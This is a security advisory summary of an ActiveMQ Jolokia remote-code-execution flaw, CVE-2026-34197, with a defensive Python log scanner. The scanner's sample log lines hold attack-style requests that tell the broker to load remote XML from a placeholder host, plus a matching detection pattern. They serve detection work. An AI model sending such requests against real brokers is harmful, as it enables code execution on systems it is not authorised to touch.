Overview
- CVE-2026-34197, which CISA added to its Known Exploited Vulnerabilities list on Thursday, now carries a federal patch deadline of April 30 for civilian agencies.
- The flaw lets attackers use the Jolokia web API to force the broker to load a remote Spring XML file that executes code on the ActiveMQ Java process.
- ActiveMQ Classic versions before 5.19.4 and 6.2.3 are affected, so admins should upgrade to 6.2.3 or the latest 5.19.x release and treat remediation as high priority.
- Access to Jolokia is supposed to require a login, yet default admin passwords are common and a separate bug in 6.0.0–6.1.1 can expose Jolokia without authentication, creating an easy path to remote code execution.
- Security firms report live probing and exploitation attempts against internet-facing brokers, with more than 7,500 servers exposed online, so teams should lock down /api/jolokia/, change default credentials, and watch logs for brokerConfig=xbean:http requests.
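A small log check for the indicator named in the last bullet, written as an added example rather than code from the advisory or the ActiveMQ project. It assumes an NCSA-style access log as written by the broker's embedded Jetty (field layout is an assumption) and runs over constructed sample lines, decoding percent-encoding so an encoded `brokerConfig=xbean:http` does not slip past a plain string match.

```python
"""Flag access-log requests to /api/jolokia/ carrying the
brokerConfig=xbean:http indicator associated with CVE-2026-34197."""
import re
from urllib.parse import unquote

# Assumption: NCSA/combined-style line as emitted by Jetty's request log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Indicator from the advisory summary; matched case-insensitively after decoding.
INDICATOR = re.compile(r'brokerconfig=xbean:https?:', re.IGNORECASE)


def is_suspicious(path: str) -> bool:
    """True when a Jolokia request path, once URL-decoded, carries the indicator."""
    decoded = unquote(unquote(path))  # tolerate single and double encoding
    if not decoded.lower().startswith('/api/jolokia/'):
        return False
    return INDICATOR.search(decoded) is not None


def scan(lines):
    """Return (ip, user, path, status) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_suspicious(m['path']):
            hits.append((m['ip'], m['user'], m['path'], m['status']))
    return hits


# Constructed sample lines, not real traffic; 198.51.100.0/24 is documentation space
# and *.invalid hosts are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - admin [12/Apr/2026:10:01:02 +0000] '
    '"GET /api/jolokia/version HTTP/1.1" 200 312',
    '198.51.100.9 - admin [12/Apr/2026:10:01:05 +0000] '
    '"GET /api/jolokia/exec/MBEAN-PLACEHOLDER/brokerConfig=xbean:http://host.invalid/a.xml HTTP/1.1" 200 44',
    '198.51.100.9 - - [12/Apr/2026:10:01:09 +0000] '
    '"GET /api/jolokia/exec/MBEAN-PLACEHOLDER/brokerConfig%3Dxbean%3Ahttp%3A%2F%2Fhost.invalid%2Fb.xml HTTP/1.1" 401 0',
    '198.51.100.12 - - [12/Apr/2026:10:02:00 +0000] '
    '"GET /admin/index.jsp HTTP/1.1" 200 5120',
]

if __name__ == '__main__':
    for ip, user, path, status in scan(SAMPLE_LOG):
        print(f'ALERT {ip} user={user} status={status} {path}')
```

The third sample line has user `-` and status 401, the shape to expect on a broker where Jolokia is still authenticated; a 200 on the same request is the case worth paging on.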